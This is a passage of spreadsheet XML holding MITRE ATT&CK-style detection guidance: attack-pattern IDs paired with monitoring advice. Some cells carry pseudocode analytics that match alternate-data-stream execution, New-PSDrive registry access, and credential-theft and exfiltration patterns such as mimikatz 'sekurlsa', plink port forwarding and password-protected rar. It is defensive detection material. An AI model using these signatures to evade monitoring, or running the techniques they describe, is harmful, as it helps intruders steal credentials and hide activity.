&lt;code&gt;ads_processes = filter processes where (event_id = 1 exe = "C:\\Windows\\*\\powershell.exe" AND command_line = "Invoke-CimMethod\s+-ClassName\s+Win32_Process\s+-MethodName\s+Create.*\b(\w+(\.\w+)?):(\w+(\.\w+)?)|-ep bypass\s+-\s+&lt;.*\b(\w+(\.\w+)?):(\w+(\.\w+)?)|-command.*Get-Content.*-Stream.*Set-Content.*start-process .*(\w+(\.\w+)?)"&lt;/code&gt;
&lt;h4&gt;Analytic 2 - NTFS Alternate Data Stream Execution : System Utilities (WMIC)&lt;/h4&gt;
&lt;code&gt;ads_processes = filter processes where (event_id = 1 exe = "C:\\Windows\\*\\wmic.exe" AND command_line = "process call create.*\"(\w+(\.\w+)?):(\w+(\.\w+)?)"&lt;code&gt;
&lt;h4&gt;Analytic 3 - NTFS Alternate Data Stream Execution : System Utilities (rundll32)&lt;/h4&gt;
&lt;code&gt;ads_processes = filter processes where (event_id = 1 exe = "C:\\Windows\\*\\rundll32.exe" AND command_line = "\"?(\w+(\.\w+)?):(\w+(\.\w+)?)?\"?,\w+\|(advpack\.dll\|ieadvpack\.dll),RegisterOCX\s+(\w+\.\w+):(\w+(\.\w+)?)\|(shdocvw\.dll\|ieframe\.dll),OpenURL.*(\w+\.\w+):(\w+(\.\w+)?)"&lt;/code&gt;
&lt;h4&gt;Analytic 4 - NTFS Alternate Data Stream Execution : System Utilities (wscript/cscript)&lt;/h4&gt;
&lt;code&gt;ads_processes = filter processes where (event_id = 1 exe = "C:\\Windows\\*\\wscript.exe" OR exe = "C:\\Windows\\*\\cscript.exe)" AND command_line = "(?&lt;!\/)\b\w+(\.\w+)?:\w+(\.\w+)?$"&lt;/code&gt;</t>
  </si>
  <si>
    <t>relationship--0f2d97a6-17ba-4c40-be5b-ce9763956a53</t>
  </si>
  <si>
    <t>attack-pattern--f63fe421-b1d1-45c0-b8a7-02cd16ff2bed</t>
  </si>
  <si>
    <t>Monitor executed commands and arguments that may establish persistence by executing malicious content triggered by Netsh Helper DLLs.</t>
  </si>
  <si>
    <t>relationship--20536e06-4457-4a3d-abc8-1cba5b348f53</t>
  </si>
  <si>
    <t>attack-pattern--818302b2-d640-477b-bf88-873120ce85c4</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</si>
  <si>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</si>
  <si>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relationship--3eafcf0b-eab0-4d30-a05e-c6792408190e</t>
  </si>
  <si>
    <t>relationship--208c8563-1616-4c9a-8414-58423f17ac4c</t>
  </si>
  <si>
    <t>Monitor executed commands and arguments that may attempt to get a listing of services running on remote hosts, including those that may be vulnerable to remote software exploitation.</t>
  </si>
  <si>
    <t>relationship--c7b5df1e-6a10-4f48-97b4-dd6994e2179c</t>
  </si>
  <si>
    <t>attack-pattern--a750a9f6-0bde-4bb3-9aae-1e2786e9780c</t>
  </si>
  <si>
    <t>Monitor executed commands and arguments of net use commands associated with establishing and removing remote shares over SMB, including following best practices for detection of Windows Admin Shares.</t>
  </si>
  <si>
    <t>relationship--39677623-c73a-4ddb-aa49-c371d36016ba</t>
  </si>
  <si>
    <t>attack-pattern--3489cfc5-640f-4bb3-a103-9137b97de79f</t>
  </si>
  <si>
    <t>Monitor executed commands and arguments that may look for folders and drives shared on remote systems as a means of identifying sources of information to gather as a precursor for Collection and to identify potential systems of interest for Lateral Movement.</t>
  </si>
  <si>
    <t>relationship--885ac160-6a6e-4308-9d69-fdbe56d96f93</t>
  </si>
  <si>
    <t>attack-pattern--3257eb21-f9a7-4430-8de1-d8b6e288f529</t>
  </si>
  <si>
    <t>Monitor executed commands and arguments for actions that aid in sniffing network traffic to capture information about an environment, including authentication material passed over the network</t>
  </si>
  <si>
    <t>relationship--99019cb2-58d1-441c-a472-909e48efb71e</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</si>
  <si>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</si>
  <si>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relationship--e586bf09-9e31-483c-b935-8341f934e22f</t>
  </si>
  <si>
    <t>attack-pattern--b3d682b6-98f2-4fb0-aa3b-b4df007ca70a</t>
  </si>
  <si>
    <t>relationship--a299d166-08c3-4be5-b572-ec109fd87d37</t>
  </si>
  <si>
    <t>attack-pattern--6e3bd510-6b33-41a4-af80-2d80f3ee0071</t>
  </si>
  <si>
    <t>Command arguments used before and after the invocation of odbcconf.exe may also be useful in determining the origin and purpose of the DLL being loaded.</t>
  </si>
  <si>
    <t>relationship--0973d20e-45a6-4b06-95ad-05b4687f4d29</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</si>
  <si>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</si>
  <si>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relationship--ec4dfd75-c48d-4976-859e-b8732f907fc2</t>
  </si>
  <si>
    <t>attack-pattern--79a47ad0-fc3b-4821-9f01-a026b1ddba21</t>
  </si>
  <si>
    <t>Monitor executed commands and arguments that may abuse Microsoft Office templates to obtain persistence on a compromised system.</t>
  </si>
  <si>
    <t>relationship--5ef4206d-aaa0-47c4-bed2-9c803a9d4585</t>
  </si>
  <si>
    <t>attack-pattern--ed7efd4d-ce28-4a19-a8e6-c58011eb2c7a</t>
  </si>
  <si>
    <t>Monitor executed commands and arguments that may abuse the Microsoft Office "Office Test" Registry key to obtain persistence on a compromised system.</t>
  </si>
  <si>
    <t>relationship--813e0e62-d6b4-4738-bb03-2ff9df3ba15c</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</si>
  <si>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</si>
  <si>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relationship--baf8dbad-1cc6-4e3b-84d5-29d4dd2bb3a0</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</si>
  <si>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</si>
  <si>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relationship--b49eaa88-9940-4e38-b247-5d13324422f8</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</si>
  <si>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</si>
  <si>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relationship--bcd6ba8a-bf2b-4902-bf64-96a1f5c2f5ea</t>
  </si>
  <si>
    <t>attack-pattern--315f51f0-6b03-4c1e-bfb2-84740afb8e21</t>
  </si>
  <si>
    <t>Monitor executed commands and arguments that may acquire user credentials from third-party password managers. (Citation: ise Password Manager February 2019)</t>
  </si>
  <si>
    <t>relationship--79a228b4-a0b7-44ca-80a2-7c6884070214</t>
  </si>
  <si>
    <t>attack-pattern--b6075259-dba3-44e9-87c7-e954f37ec0d5</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</si>
  <si>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</si>
  <si>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relationship--a2fd57eb-3126-466a-92d0-8abfe6c1722b</t>
  </si>
  <si>
    <t>attack-pattern--348f1eef-964b-4eb6-bb53-69b3dcb0c643</t>
  </si>
  <si>
    <t>Monitor executed commands and arguments that may attempt to gather information about attached peripheral devices and components connected to a computer system.</t>
  </si>
  <si>
    <t>relationship--e5a87e35-79ed-4903-9f68-7d762b02162d</t>
  </si>
  <si>
    <t>Monitor executed commands and arguments acquired through Windows system management tools such as Windows Management Instrumentation and PowerShell.</t>
  </si>
  <si>
    <t>relationship--7f837da0-8cd8-4e46-a7ae-9fb6c9304df9</t>
  </si>
  <si>
    <t>attack-pattern--7d20fff9-8751-404e-badd-ccd71bda0236</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</si>
  <si>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</si>
  <si>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relationship--33335fca-0e01-49ba-b631-4009127533eb</t>
  </si>
  <si>
    <t>attack-pattern--ea071aa0-8f17-416f-ab0d-2bab7e79003d</t>
  </si>
  <si>
    <t>Monitor and inspect commands and arguments associated with manipulating the power settings of a system.</t>
  </si>
  <si>
    <t>relationship--8602e7cd-6b35-405f-9466-cf6bb5a07240</t>
  </si>
  <si>
    <t>attack-pattern--970a3432-3237-47ad-bcca-7d8cbb217736</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</si>
  <si>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</si>
  <si>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relationship--d8cc55d6-2864-4642-a4e5-9e57b6033b52</t>
  </si>
  <si>
    <t>attack-pattern--0f2c410d-d740-4ed9-abb1-b8f4a7faf6c3</t>
  </si>
  <si>
    <t>Monitor abnormal PowerShell commands, unusual loading of PowerShell drives or modules.</t>
  </si>
  <si>
    <t>relationship--28651e2d-f9bd-4f85-8956-e6afbd679c53</t>
  </si>
  <si>
    <t>attack-pattern--7f0ca133-88c4-40c6-a62f-b3083a7fbc2e</t>
  </si>
  <si>
    <t>Monitor executed commands and arguments in command history in either the console or as part of the running memory to determine if unauthorized or suspicious commands were used to modify device configuration.</t>
  </si>
  <si>
    <t>relationship--d8d8ce21-9439-4b62-9021-ae4037172173</t>
  </si>
  <si>
    <t>attack-pattern--60b508a1-6a5e-46b1-821a-9f7b78752abf</t>
  </si>
  <si>
    <t>Monitor executed commands and arguments that may search for private key certificate files on compromised systems for insecurely stored credentials.</t>
  </si>
  <si>
    <t>relationship--24e53924-ea02-4cbb-9967-f76c151f0278</t>
  </si>
  <si>
    <t>attack-pattern--3120b9fa-23b8-4500-ae73-09494f607b7d</t>
  </si>
  <si>
    <t>Monitor executed commands and arguments that may gather credentials from information stored in the Proc filesystem or &lt;code&gt;/proc&lt;/code&gt;.</t>
  </si>
  <si>
    <t>relationship--668139fd-1238-43f0-b768-1b7db4a1f5a0</t>
  </si>
  <si>
    <t>attack-pattern--8f4a33ec-8b1f-4b80-a2f6-642b2e479580</t>
  </si>
  <si>
    <t>Monitor executed commands and arguments for actions that may attempt to get information about running processes on a system.</t>
  </si>
  <si>
    <t>relationship--91694b7a-9230-41ec-81c4-3438fffa0858</t>
  </si>
  <si>
    <t>attack-pattern--09cd431f-eaf4-4d2a-acaf-2a7acfe7ed58</t>
  </si>
  <si>
    <t>Monitor executed commands and arguments for scripts like PubPrn.vbs that may be used to proxy execution of malicious files.</t>
  </si>
  <si>
    <t>relationship--a149c02f-f710-4a4c-b69f-b257cc4bd3c3</t>
  </si>
  <si>
    <t>attack-pattern--cc3502b5-30cc-4473-ad48-42d51a6ef6d1</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</si>
  <si>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</si>
  <si>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relationship--cf6c50a3-1de8-4fb4-8e8f-0a28b642824c</t>
  </si>
  <si>
    <t>attack-pattern--c32f7008-9fea-41f7-8366-5eb9b74bd896</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</si>
  <si>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&lt;h4&gt; Analytic 1 - Suspicious Commands &lt;/h4&gt;
&lt;code&gt; suspicious_commands = filter command_line where
  EventId == "4103" AND
  (CommandName LIKE '%New-PSDrive%' AND 
       (CommandParameterValue LIKE ‘%Registry%’ OR
        CommandParameterValue LIKE '%HKEY_CLASSES_ROOT%' OR
        CommandParameterValue LIKE '%HKCR%')) &lt;/code&gt;</t>
  </si>
  <si>
    <t>relationship--c06f3e00-c272-4616-8b25-4c2cccf944f6</t>
  </si>
  <si>
    <t>attack-pattern--dca670cf-eeec-438f-8185-fd959d9ef211</t>
  </si>
  <si>
    <t>Monitor executed commands and arguments resulting from RC scripts for unusual or unknown applications or behavior</t>
  </si>
  <si>
    <t>relationship--b5ae2231-49c3-430d-aade-1dfe499cdb57</t>
  </si>
  <si>
    <t>attack-pattern--e0033c16-a07e-48aa-8204-7c3ca669998c</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</si>
  <si>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</si>
  <si>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relationship--839a96b4-bd9d-4dce-8d92-a98a8672755f</t>
  </si>
  <si>
    <t>attack-pattern--e5cc9e7a-e61a-46a1-b869-55fb6eab058e</t>
  </si>
  <si>
    <t>Monitor executed commands and arguments that may modify plist files to automatically run an application when a user logs in.</t>
  </si>
  <si>
    <t>relationship--78e5db72-54db-4c89-85ac-66cac1bddb9c</t>
  </si>
  <si>
    <t>attack-pattern--9efb1ea7-c37b-4595-9640-b7680cd84279</t>
  </si>
  <si>
    <t>Monitor executed commands and arguments that may achieve persistence by adding a program to a startup folder or referencing it with a Registry run key.</t>
  </si>
  <si>
    <t>relationship--1f995d29-e7a6-4bf5-bbee-8783c31328f3</t>
  </si>
  <si>
    <t>attack-pattern--c48a67ee-b657-45c1-91bf-6cdbe27205f8</t>
  </si>
  <si>
    <t>Command arguments used before and after Regsvcs.exe or Regasm.exe invocation may also be useful in determining the origin and purpose of the binary being executed.</t>
  </si>
  <si>
    <t>relationship--0c52ac40-1949-4fb6-8c2c-344c1d3d6801</t>
  </si>
  <si>
    <t>attack-pattern--b97f1d35-4249-4486-a6b5-ee60ccf24fab</t>
  </si>
  <si>
    <t>Command arguments used before and after the regsvr32.exe invocation may also be useful in determining the origin and purpose of the script or DLL being loaded. (Citation: Carbon Black Squiblydoo Apr 2016)</t>
  </si>
  <si>
    <t>relationship--939c9a5a-abdb-46f9-b774-55015409fa90</t>
  </si>
  <si>
    <t>attack-pattern--359b00ad-9425-420b-bba5-6de8d600cbc0</t>
  </si>
  <si>
    <t>relationship--ac6f5587-f6ae-4178-bc34-c2d4a30b305b</t>
  </si>
  <si>
    <t>Monitor executed commands and arguments for actions that may target an Exchange server, Office 365, or Google Workspace to collect sensitive information.</t>
  </si>
  <si>
    <t>relationship--ed98718b-d701-4009-99c3-94ba3f4ba6c0</t>
  </si>
  <si>
    <t>attack-pattern--5b0ad6f8-6a16-4966-a4ef-d09ea6e2a9f5</t>
  </si>
  <si>
    <t>Monitor executed commands and arguments that may take control of preexisting sessions with remote services to move laterally in an environment.</t>
  </si>
  <si>
    <t>relationship--636889e5-e2e8-4bfe-9c9d-1cd7caef9f73</t>
  </si>
  <si>
    <t>attack-pattern--54a649ff-439a-41a4-9856-8d144a2551ba</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</si>
  <si>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&lt;h4&gt;Analytic 1 - Suspicious Arguments&lt;/h4&gt;
&lt;code&gt;port_fwd = filter process where (command_line match "-R .* -pw")
scp = filter process where (command_line match "-pw .* .* .*@.*"
mimikatz = filter process where (command_line match "sekurlsa")
rar = filter process where (command_line match " -hp ")
archive = filter process where (command_line match ".* a .*")
ip_addr = filter process where (command_line match \d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3})&lt;/code&gt;
</t>
  </si>
  <si>
    <t>relationship--82f14e35-47d1-4d6f-8d66-c8bcf62c336f</t>
  </si>
  <si>
    <t>attack-pattern--e358d692-23c0-4a31-9eb6-ecc13a8d7735</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</si>
  <si>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</si>
  <si>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relationship--20c4cb30-5393-41de-9354-46073a87d906</t>
  </si>
  <si>
    <t>attack-pattern--bd5b58a4-a52d-4a29-bc0d-3f1d3968eb6b</t>
  </si>
  <si>
    <t>Monitor executed commands and arguments that may rename legitimate system utilities to try to evade security mechanisms concerning the usage of those utilities.</t>
  </si>
  <si>
    <t>relationship--85204c75-a6b1-4342-83bb-14dfba61d3e0</t>
  </si>
  <si>
    <t>16 November 2022</t>
  </si>
  <si>
    <t>attack-pattern--b22e5153-ac28-4cc6-865c-2054e36285cb</t>
  </si>
  <si>
    <t>Monitor executed commands and arguments that are leveraging the use of resource forks, especially those immediately followed by potentially malicious activity such as creating network connections.</t>
  </si>
  <si>
    <t>relationship--e85bf694-00ce-4e2a-835c-dd899dfb813d</t>
  </si>
  <si>
    <t>attack-pattern--cd25c1b4-935c-4f0e-ba8d-552f28bc4783</t>
  </si>
  <si>
    <t>Monitor executed commands and arguments that may indicate common cryptomining or proxyware functionality.</t>
  </si>
  <si>
    <t>relationship--c507e487-2213-46de-87fa-9879b31995b7</t>
  </si>
  <si>
    <t>06 July 2023</t>
  </si>
  <si>
    <t xml:space="preserve">Monitor command-line usage for &lt;code&gt;-AllowReversiblePasswordEncryption $true&lt;/code&gt; or other actions that could be related to malicious tampering of user settings (i.e. [Group Policy Modification](https://attack.mitre.org/techniques/T1484/001)). </t>
  </si>
  <si>
    <t>relationship--aec82e75-52d3-4139-aded-73cd1fe5e39b</t>
  </si>
  <si>
    <t>attack-pattern--b5327dd1-6bf9-4785-a199-25bcbd1f4a9d</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</si>
  <si>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</si>
  <si>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relationship--ecba3572-741f-4b9f-8d4e-a44d9b648ae6</t>
  </si>
  <si>
    <t>attack-pattern--045d0922-2310-4e60-b5e4-3302302cb3c5</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</si>
  <si>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</si>
  <si>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relationship--07c4bc2b-c593-4fc2-b4f9-b52dadeb72b9</t>
  </si>
  <si>
    <t>attack-pattern--4f9ca633-15c5-463c-9724-bdcd54fde541</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</si>
  <si>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</si>
  <si>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relationship--d7b34990-24d1-4eb1-a612-8079bf1a2e20</t>
  </si>
  <si>
    <t>attack-pattern--6b57dc31-b814-4a03-8706-28bc20d739c4</t>
  </si>
  <si>
    <t>Monitor executed commands and arguments to modify the authorized_keys or /etc/ssh/sshd_config files.</t>
  </si>
  <si>
    <t>relationship--2844948c-9ca4-4d5d-9796-2104f51e6962</t>
  </si>
  <si>
    <t>attack-pattern--4d2a5b3e-340d-4600-9123-309dd63c9bf8</t>
  </si>
  <si>
    <t>Monitor executed commands and arguments that may hijack a legitimate user's SSH session to move laterally within an environment.</t>
  </si>
  <si>
    <t>relationship--591c9a90-95e5-44cc-8a16-2d972c7174e9</t>
  </si>
  <si>
    <t>attack-pattern--28170e17-8384-415c-8486-2e6b294cb803</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</si>
  <si>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</si>
  <si>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relationship--9e756bc5-a3b2-4b4e-bdc5-dce1c5e137e5</t>
  </si>
  <si>
    <t>attack-pattern--005a06c6-14bf-4118-afa0-ebcd8aebb0c9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</si>
  <si>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Analytic 1 : New processes whose command line includes commands that create or modify scheduled tasks with a suspicious script, extension or user writable path &lt;/h4&gt;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</si>
  <si>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relationship--59e0f91a-278b-49f9-8f8d-93b2b9914fad</t>
  </si>
  <si>
    <t>attack-pattern--35dd844a-b219-4e2b-a6bb-efa9a75995a9</t>
  </si>
  <si>
    <t>Monitor executed commands and arguments that may abuse task scheduling functionality to facilitate initial or recurring execution of malicious code.</t>
  </si>
  <si>
    <t>relationship--d0cab002-8d7c-4aab-ac22-ac7631f338ba</t>
  </si>
  <si>
    <t>attack-pattern--0259baeb-9f63-4c69-bf10-eb038c390688</t>
  </si>
  <si>
    <t>Monitor executed commands and arguments that may attempt to take screen captures of the desktop to gather information over the course of an operation.</t>
  </si>
  <si>
    <t>relationship--295b6c01-1a79-4fd9-b3a1-010affcc3c88</t>
  </si>
  <si>
    <t>attack-pattern--ce4b7013-640e-48a9-b501-d0025a95f4bf</t>
  </si>
  <si>
    <t>Monitor executed commands and arguments of .scr files.
&lt;h4&gt; Analytic 1 - Modify the HKCU\Control Panel\Desktop registry key &lt;/h4&gt;
&lt;code&gt; suspicious_processes = filter processes where
  (event_id == "1" OR event_id == "4688") AND
  (ProcessCommandLine LIKE '%reg%' AND ProcessCommandLine LIKE '%add%' AND ProcessCommandLine LIKE '%HKCU\Control Panel\Desktop\%') &lt;/code&gt;</t>
  </si>
  <si>
    <t>relationship--a6385229-7849-4813-b298-54fc7979ef71</t>
  </si>
  <si>
    <t>attack-pattern--1644e709-12d2-41e5-a60f-3470991f5011</t>
  </si>
  <si>
    <t>Monitor executed commands and arguments that may attempt to extract credential material from the Security Account Manager (SAM) database either through in-memory techniques or through the Windows Registry where the SAM database is stored.</t>
  </si>
  <si>
    <t>relationship--22da85ee-6ef2-490b-9850-41be8a9b3860</t>
  </si>
  <si>
    <t>attack-pattern--cba37adb-d6fb-4610-b069-dd04c0643384</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</si>
  <si>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</si>
  <si>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relationship--db89fa32-36b4-4642-80b1-144e7d3d7c97</t>
  </si>
  <si>
    <t>attack-pattern--5095a853-299c-4876-abd7-ac0050fb5462</t>
  </si>
  <si>
    <t>Monitor executed commands and arguments that may abuse security support providers (SSPs) to execute DLLs when the system boots.</t>
  </si>
  <si>
    <t>relationship--0cde4443-ca79-439d-ba98-e6c4aa57e70a</t>
  </si>
  <si>
    <t>attack-pattern--1a80d097-54df-41d8-9d33-34e755ec5e72</t>
  </si>
  <si>
    <t>Monitor executed commands and arguments that may obtain root access (allowing them to read securityd’s memory), then they can scan through memory to find the correct sequence of keys in relatively few tries to decrypt the user’s logon keychain.</t>
  </si>
  <si>
    <t>relationship--527b9fde-f641-46ae-8e10-1e23e3ec632d</t>
  </si>
  <si>
    <t>attack-pattern--f1951e8a-500e-4a26-8803-76d95c4554b4</t>
  </si>
  <si>
    <t>Monitor executed commands and arguments that may abuse the Windows service control manager to execute malicious commands or payloads.</t>
  </si>
  <si>
    <t>relationship--ef2c3ef7-702b-4c48-90b9-d0841ac7c433</t>
  </si>
  <si>
    <t>attack-pattern--20fb2507-d71c-455d-9b6d-6104461cf26b</t>
  </si>
  <si>
    <t>Monitor executed commands and arguments that may stop or disable services on a system to render those services unavailable to legitimate users.</t>
  </si>
  <si>
    <t>relationship--2567c45f-d2f9-4abd-9479-2877669e50be</t>
  </si>
  <si>
    <t>attack-pattern--17cc750b-e95b-4d7d-9dde-49e0de24148c</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</si>
  <si>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</si>
  <si>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relationship--636b7901-4dbf-4696-b75c-30a9df2818ef</t>
  </si>
  <si>
    <t>attack-pattern--6831414d-bb70-42b7-8030-d4e06b2660c9</t>
  </si>
  <si>
    <t>Monitor for execution of utilities, like chmod, and their command-line arguments to look for setuid or setguid bits being set.</t>
  </si>
  <si>
    <t>relationship--07bde07d-0aa0-42ac-a83c-9bfb154abb22</t>
  </si>
  <si>
    <t>attack-pattern--e3b6daca-e963-4a69-aee6-ed4fd653ad58</t>
  </si>
  <si>
    <t>Monitor executed commands and arguments that may attempt to get a listing of software and software versions that are installed on a system or in a cloud environment.</t>
  </si>
  <si>
    <t>relationship--970bbf34-75a5-46a3-9f89-cd573a6fcbfc</t>
  </si>
  <si>
    <t>attack-pattern--c0dfe7b0-b873-4618-9ff8-53e31f70907f</t>
  </si>
  <si>
    <t>relationship--13e1719a-88b7-444f-95ca-cefa2d377448</t>
  </si>
  <si>
    <t>Monitor for the execution of commands and other utilities abused to forge and/or steal certificates and related private keys.(Citation: SpecterOps Certified Pre Owned)</t>
  </si>
  <si>
    <t>relationship--0aca6607-4fa4-4ff3-a928-c35659358e01</t>
  </si>
  <si>
    <t>Monitor executed commands and arguments that may attempt to subvert Kerberos authentication by stealing or forging Kerberos tickets to enable [Pass the Ticket](https://attack.mitre.org/techniques/T1550/003).</t>
  </si>
  <si>
    <t>relationship--68c60234-8e28-410c-a0a0-94ca1a079f1e</t>
  </si>
  <si>
    <t>attack-pattern--b83e166d-13d7-4b52-8677-dff90c548fd7</t>
  </si>
  <si>
    <t>Command monitoring may reveal malicious attempts to modify trust settings, such as the installation of root certificates or modifications to trust attributes/policies applied to files.</t>
  </si>
  <si>
    <t>relationship--834d8aa0-d752-492a-8e01-45ef0b88ece9</t>
  </si>
  <si>
    <t>attack-pattern--1365fe3b-0f50-455d-b4da-266ce31c23b0</t>
  </si>
  <si>
    <t>Monitor executed commands and arguments that may perform sudo caching and/or use the suoders file to elevate privileges, such as the &lt;code&gt;sudo&lt;/code&gt; command.</t>
  </si>
  <si>
    <t>relationship--8e3949cd-d3cf-47a6-ae5c-6afdff8c04d0</t>
  </si>
  <si>
    <t>attack-pattern--457c7820-d331-465a-915e-42f85500ccc4</t>
  </si>
  <si>
    <t>Monitor executed commands and arguments that may forge credential materials that can be used to gain access to web applications or Internet services.</t>
  </si>
  <si>
    <t>relationship--fec13b81-c639-4eaa-8d9f-75043a02f46a</t>
  </si>
  <si>
    <t>attack-pattern--29be378d-262d-4e99-b00d-852d573628e6</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</si>
  <si>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</si>
  <si>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relationship--908f3bce-01c5-4d0d-8dc9-4cc1a8bd9ceb</t>
  </si>
  <si>
    <t>attack-pattern--354a7f88-63fb-41b5-a801-ce3b377b36f1</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</si>
  <si>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</si>
  <si>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relationship--8fe6c997-0c72-49b2-9e43-6204e9cc3039</t>
  </si>
  <si>
    <t>attack-pattern--c1b68a96-3c48-49ea-a6c0-9b27359f9c19</t>
  </si>
  <si>
    <t>Monitor executed commands and arguments that may attempt to gather information about the system language of a victim in order to infer the geographical location of that host.</t>
  </si>
  <si>
    <t>relationship--eff80158-12c4-4d75-a421-276e19ed3717</t>
  </si>
  <si>
    <t>attack-pattern--c877e33f-1df6-40d6-b1e7-ce70f16f4979</t>
  </si>
  <si>
    <t>Monitor executed commands and arguments that may gather information in an attempt to calculate the geographical location of a victim host.</t>
  </si>
  <si>
    <t>relationship--b9250852-1e69-435c-8414-bbf27593eedb</t>
  </si>
  <si>
    <t>attack-pattern--707399d6-ab3e-4963-9315-d9d3818cd6a0</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</si>
  <si>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</si>
  <si>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relationship--7779aecc-13bd-41cc-9630-6f8e04b6dd01</t>
  </si>
  <si>
    <t>attack-pattern--7e150503-88e7-4861-866b-ff1ac82c4475</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</si>
  <si>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</si>
  <si>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relationship--f6127058-7b4b-4277-b9d1-860595bba0f3</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</si>
  <si>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</si>
  <si>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relationship--1f66707a-6cd7-4af1-a388-b0ff022af7db</t>
  </si>
  <si>
    <t>attack-pattern--f6fe9070-7a65-49ea-ae72-76292f42cebe</t>
  </si>
  <si>
    <t>relationship--269dd749-de74-489d-b9bd-81017b1689e0</t>
  </si>
  <si>
    <t>attack-pattern--322bad5a-1c49-4d23-ab79-76d641794afa</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</si>
  <si>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</si>
  <si>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relationship--667ae01a-69ae-43c7-98c5-1a32ca1e93fa</t>
  </si>
  <si>
    <t>attack-pattern--d157f9d2-d09a-4efa-bb2a-64963f94e253</t>
  </si>
  <si>
    <t>Monitor for command line invocations of tools capable of modifying services that doesn’t correspond to normal usage patterns and known software, patch cycles, etc.</t>
  </si>
  <si>
    <t>relationship--f7a6308b-a588-4410-a234-0d85ae1cccd1</t>
  </si>
  <si>
    <t>attack-pattern--ff73aa03-0090-4464-83ac-f89e233c02bc</t>
  </si>
  <si>
    <t>Monitor executed commands and arguments of binaries involved in shutting down or rebooting systems. For network devices, monitor executed commands in AAA logs, especially those run by unexpected or unauthorized users.</t>
  </si>
  <si>
    <t>relationship--b48242d1-a81e-4dd0-85fa-563aa907aa94</t>
  </si>
  <si>
    <t>attack-pattern--f3c544dc-673c-4ef3-accb-53229f1ae077</t>
  </si>
  <si>
    <t>Monitor executed commands and arguments for actions that may gather the system time and/or time zone from a local or remote system.</t>
  </si>
  <si>
    <t>relationship--e7465950-100a-4ed3-ad90-02c0dc5edd08</t>
  </si>
  <si>
    <t>attack-pattern--dfefe2ed-4389-4318-8762-f0272b350a1b</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</si>
  <si>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</si>
  <si>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relationship--1ff32fe1-7555-4582-879c-63cb6e78e4ba</t>
  </si>
  <si>
    <t>attack-pattern--a542bac9-7bc1-4da7-9a09-96f69e23cc21</t>
  </si>
  <si>
    <t>Monitor executed commands and arguments the 'systemd-run' utility as it may be used to create timers</t>
  </si>
  <si>
    <t>relationship--b4912109-2712-4f26-b49d-a5357a49fc41</t>
  </si>
  <si>
    <t>attack-pattern--28abec6c-4443-4b03-8206-07f2e264a6b4</t>
  </si>
  <si>
    <t>relationship--0de53f4c-a286-44da-be79-52960c7f2f84</t>
  </si>
  <si>
    <t>attack-pattern--379809f6-2fac-42c1-bd2e-e9dee70b27f8</t>
  </si>
  <si>
    <t>Monitor executed commands and arguments for potential adversary actions to modify Registry values (ex: &lt;code&gt;reg.exe&lt;/code&gt;) or modify/replace the legitimate &lt;code&gt;termsrv.dll&lt;/code&gt;.</t>
  </si>
  <si>
    <t>relationship--9a4838fe-e9f1-4bdc-b723-8b75461f6ad0</t>
  </si>
  <si>
    <t>attack-pattern--4bed873f-0b7d-41d4-b93a-b6905d1f90b0</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</si>
  <si>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</si>
  <si>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relationship--81235a36-7047-4382-88a4-2f8a6e8dd12c</t>
  </si>
  <si>
    <t>attack-pattern--61afc315-860c-4364-825d-0d62b2e91edc</t>
  </si>
  <si>
    <t>Monitor executed commands and arguments that may abuse time providers to execute DLLs when the system boots.</t>
  </si>
  <si>
    <t>relationship--a3881772-b2f3-475f-ad5c-628593a8de74</t>
  </si>
  <si>
    <t>attack-pattern--86850eff-2729-40c3-b85e-c4af26da4a2d</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</si>
  <si>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</si>
  <si>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relationship--056add36-53ac-4496-ad33-31053e25046e</t>
  </si>
  <si>
    <t>attack-pattern--63220765-d418-44de-8fae-694b3912317d</t>
  </si>
  <si>
    <t>Monitor executed commands and arguments that may establish persistence by executing malicious content triggered by an interrupt signal.</t>
  </si>
  <si>
    <t>relationship--8f925090-4063-429f-a0a4-ccaf4825ef78</t>
  </si>
  <si>
    <t>attack-pattern--ff25900d-76d5-449b-a351-8824e62fc81b</t>
  </si>
  <si>
    <t>relationship--160209ea-5efb-44cf-bc21-fa0c4a8d702f</t>
  </si>
  <si>
    <t>attack-pattern--a9d4b653-6915-42af-98b2-5758c4ceee56</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</si>
  <si>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</si>
  <si>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relationship--3129063c-ece7-4d72-8728-e72febde953a</t>
  </si>
  <si>
    <t>attack-pattern--b63a34e8-0a61-4c97-a23b-bf8a2ed812e2</t>
  </si>
  <si>
    <t>Monitor executed commands and arguments that may establish persistence through executing malicious commands triggered by a user’s shell.</t>
  </si>
  <si>
    <t>relationship--530ca8a2-0cee-4aa5-a445-a8ad5822fc32</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</si>
  <si>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</si>
  <si>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relationship--3e7a9b97-079a-45bd-8c9b-9d04115b0d89</t>
  </si>
  <si>
    <t>attack-pattern--91541e7e-b969-40c6-bbd8-1b5352ec2938</t>
  </si>
  <si>
    <t>relationship--84dced85-d87a-4e4c-ae88-c4b2199f0d06</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</si>
  <si>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</si>
  <si>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relationship--c1dece0c-5d63-4e8f-9860-073118df5cd1</t>
  </si>
  <si>
    <t>attack-pattern--808e6329-ca91-4b87-ac2d-8eadc5f8f327</t>
  </si>
  <si>
    <t>Command arguments used before and after the invocation of verclsid.exe may also be useful in determining the origin and purpose of the payload being executed.</t>
  </si>
  <si>
    <t>relationship--0d1ccb3a-8292-42ba-a338-58a642ef3adb</t>
  </si>
  <si>
    <t>attack-pattern--6faf650d-bf31-4eb4-802d-1000cf38efaf</t>
  </si>
  <si>
    <t>Monitor executed commands and arguments that can leverage a computer's peripheral devices (e.g., integrated cameras or webcams) or applications (e.g., video call services) to capture video recordings for the purpose of gathering information.</t>
  </si>
  <si>
    <t>relationship--63fe9e49-2f94-4a45-97b9-f64519a0c497</t>
  </si>
  <si>
    <t>attack-pattern--82caa33e-d11a-433a-94ea-9b5a5fbef81d</t>
  </si>
  <si>
    <t>relationship--77a6ec35-4708-4017-a767-ef3a86e3db1e</t>
  </si>
  <si>
    <t>attack-pattern--dfd7cc1d-e1d8-4394-a198-97c4cab8aa67</t>
  </si>
  <si>
    <t>Monitor executed commands and arguments that may abuse Visual Basic (VB) for execution.</t>
  </si>
  <si>
    <t>relationship--55307354-c0c5-4fc4-9a31-e0444ce240fe</t>
  </si>
  <si>
    <t>attack-pattern--494ab9f0-36e0-4b06-b10d-57285b040a06</t>
  </si>
  <si>
    <t>Monitor executed commands and arguments that may collect Wi-Fi information on compromised systems.</t>
  </si>
  <si>
    <t>relationship--eb502848-508e-4ed0-8d9d-57c8121fddb4</t>
  </si>
  <si>
